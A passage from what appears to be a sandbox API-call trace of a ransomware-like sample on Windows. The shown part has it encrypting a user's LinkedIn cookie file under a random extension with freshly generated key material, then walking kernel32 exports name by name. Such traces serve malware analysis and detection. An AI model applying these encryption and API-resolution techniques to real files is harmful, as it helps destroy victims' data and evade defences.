HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.743] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp" [0181.743] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.743] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.evbelfp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.763] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=536) returned 1 [0181.907] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.907] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.907] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0181.907] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0181.907] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.908] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0181.908] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0181.909] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.909] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.909] CloseHandle (hObject=0x288) returned 1 [0181.909] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.909] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0181.911] CloseHandle (hObject=0x0) returned 0 [0181.911] CloseHandle (hObject=0x284) returned 1 [0181.911] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.911] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.911] GetTickCount () returned 0x1134de2 [0181.911] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.911] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0181.912] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0181.912] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.912] lstrlenA (lpString="kernel32.dll") returned 12 [0181.912] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0181.912] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0181.912] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0181.912] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0181.912] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0181.912] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0181.912] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0181.912] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0181.912] lstrlenA (lpString="ADDATOMA") returned 8 [0181.912] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0181.912] lstrlenA (lpString="ADDATOMW") returned 8 [0181.912] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0181.912] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0181.912] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0181.912] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0181.913] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0181.913] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0181.913] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0181.913] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0181.913] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0181.913] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0181.913] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0181.913] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0181.913] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0181.913] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0181.913] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0181.913] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0181.913] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0181.913] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0181.913] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0181.913] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0181.913] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0181.913] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0181.913] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0181.913] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0181.913] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0181.913] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0181.913] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0181.913] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0181.913] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0181.913] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0181.913] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0181.913] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0181.913] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0181.913] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0181.913] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0181.913] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0181.913] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0181.913] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0181.914] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0181.914] lstrlenA (lpString="BACKUPREAD") returned 10 [0181.914] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0181.914] lstrlenA (lpString="BACKUPSEEK") returned 10 [0181.914] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0181.914] lstrlenA (lpString="BACKUPWRITE") returned 11 [0181.914] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0181.914] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0181.914] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0181.914] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0181.914] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0181.914] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0181.914] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0181.914] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0181.914] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0181.914] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0181.914] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0181.914] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0181.914] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0181.914] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0181.914] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0181.914] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0181.914] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0181.914] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0181.914] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0181.914] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0181.914] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0181.914] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0181.914] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0181.914] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0181.914] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0181.914] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0181.914] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0181.914] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0181.914] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0181.915] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0181.915] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0181.915] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0181.915] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0181.915] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0181.915] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0181.915] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0181.915] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0181.915] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0181.915] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0181.915] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0181.915] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0181.915] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0181.915] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0181.915] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0181.915] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0181.915] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0181.915] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0181.915] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0181.915] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0181.915] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0181.915] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0181.915] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0181.915] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0181.915] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0181.915] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0181.915] lstrlenA (lpString="BEEP") returned 4 [0181.915] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0181.915] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0181.915] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0181.915] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0181.915] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0181.915] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0181.915] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0181.915] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0181.916] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0181.916] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0181.916] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0181.916] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0181.916] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0181.916] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0181.916] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0181.916] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0181.916] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0181.916] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0181.916] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0181.916] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0181.916] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0181.916] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0181.916] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0181.916] lstrlenA (lpString="CANCELIO") returned 8 [0181.916] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0181.916] lstrlenA (lpString="CANCELIOEX") returned 10 [0181.916] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0181.916] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0181.916] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0181.916] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0181.916] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0181.916] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0181.916] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0181.916] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0181.916] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0181.916] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0181.916] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0181.916] lstrlenA (lpString="CHECKELEVATION") returned 14 [0181.916] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0181.916] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0181.916] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0181.917] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0181.917] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0181.917] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0181.917] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0181.917] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0181.917] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0181.917] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0181.917] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0181.917] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0181.917] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0181.917] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0181.917] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0181.917] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0181.917] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0181.917] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0181.917] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0181.917] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0181.917] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0181.917] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0181.917] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0181.917] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0181.917] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0181.917] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0181.917] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0181.917] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0181.917] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0181.917] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0181.917] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0181.917] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0181.917] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0181.917] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0181.917] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0181.917] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0181.917] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0181.918] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0181.918] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0181.918] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0181.918] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0181.918] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0181.918] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0181.918] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0181.918] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0181.918] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0181.918] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0181.918] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0181.918] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0181.918] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0181.918] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0181.918] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0181.918] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0181.918] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0181.918] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0181.918] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0181.918] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0181.918] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0181.918] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" 